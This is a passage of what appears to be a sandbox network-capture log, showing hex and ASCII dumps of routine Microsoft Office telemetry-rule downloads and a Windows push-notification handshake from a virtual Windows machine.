2024-11-04 16:31:44 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.5	49817	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:44 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:44 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:44 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: 3018d77d-101e-008d-49d2-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163144Z-16547b76f7f2g4rlhC1DFWnx8800000003sg00000000hv69 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:44 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.5	49818	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:44 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:44 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:44 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: ddaecdfb-101e-0079-21d2-2c5913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163144Z-16547b76f7frbg6bhC1DFWr54000000003tg00000000fc24 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:44 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.5	49819	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:44 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:44 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:44 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: d0aff24d-301e-000c-58d2-2c323f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163144Z-16547b76f7fcrtpchC1DFW52e800000003x000000000gek9 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:44 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.5	49821	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:45 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:45 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:45 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: 98909b4d-d01e-002b-39d2-2c25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163145Z-16547b76f7f8dwtrhC1DFWd1zn0000000430000000001sq3 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:45 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.5	49822	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:45 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:45 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:45 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: c82eced8-401e-008c-2858-2e86c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163145Z-r159446fcd7dbksqhC1DFW8q6g00000000kg000000001bmt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-04 16:31:45 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.5	49823	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:45 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:45 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:45 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: 6a4bbae2-b01e-0053-568e-2dcdf8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163145Z-15869dbbcc6m5ms4hC1DFWx02800000003yg000000007k9w x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:45 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.5	49820	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:45 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 41 49 76 46 50 73 32 50 71 45 47 39 72 79 6f 6d 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 30 39 33 39 38 36 30 32 66 30 36 66 35 39 36 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: AIvFPs2PqEG9ryom.1Context: 809398602f06f596
2024-11-04 16:31:45 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-04 16:31:45 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 41 49 76 46 50 73 32 50 71 45 47 39 72 79 6f 6d 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 30 39 33 39 38 36 30 32 66 30 36 66 35 39 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 51 6e 50 35 6e 79 30 73 4f 50 46 38 2f 39 73 66 6b 6b 38 39 4a 49 68 73 36 7a 75 59 33 54 4c 6a 75 30 65 6d 73 75 46 63 42 6e 7a 37 38 4b 75 4f 38 55 75 44 74 45 35 6b 53 35 57 7a 4b 72 59 62 46 41 6d 30 2b 69 35 59 47 65 7a 35 6b 70 78 7a 48 67 50 30 57 67 77 53 71 32 4b 58 35 76 37 69 79 51 51 43 42 64 65 77 6a 45 45 36 4c Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: AIvFPs2PqEG9ryom.2Context: 809398602f06f596<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAQnP5ny0sOPF8/9sfkk89JIhs6zuY3TLju0emsuFcBnz78KuO8UuDtE5kS5WzKrYbFAm0+i5YGez5kpxzHgP0WgwSq2KX5v7iyQQCBdewjEE6L
2024-11-04 16:31:45 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 41 49 76 46 50 73 32 50 71 45 47 39 72 79 6f 6d 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 30 39 33 39 38 36 30 32 66 30 36 66 35 39 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: AIvFPs2PqEG9ryom.3Context: 809398602f06f596<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-11-04 16:31:45 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-04 16:31:45 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 78 42 75 68 58 78 33 31 58 30 57 49 57 4b 6c 58 69 4a 43 73 6e 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: xBuhXx31X0WIWKlXiJCsnw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.5	49824	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:45 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:45 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:45 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: a6459842-d01e-0014-395c-2eed58000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163145Z-15869dbbcc6sg5zbhC1DFWbk2000000003y0000000000muq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:45 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.5	49825	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:45 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:45 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:45 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: fe4e74db-301e-003f-25bc-2c266f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163145Z-16547b76f7fm7xw6hC1DFW5px400000003t000000000gpsw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:45 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.5	49826	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:46 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:46 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:46 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: ad01162d-901e-0064-5fc3-2ce8a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163146Z-16547b76f7f7rtshhC1DFWrtqn0000000400000000004kfn x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
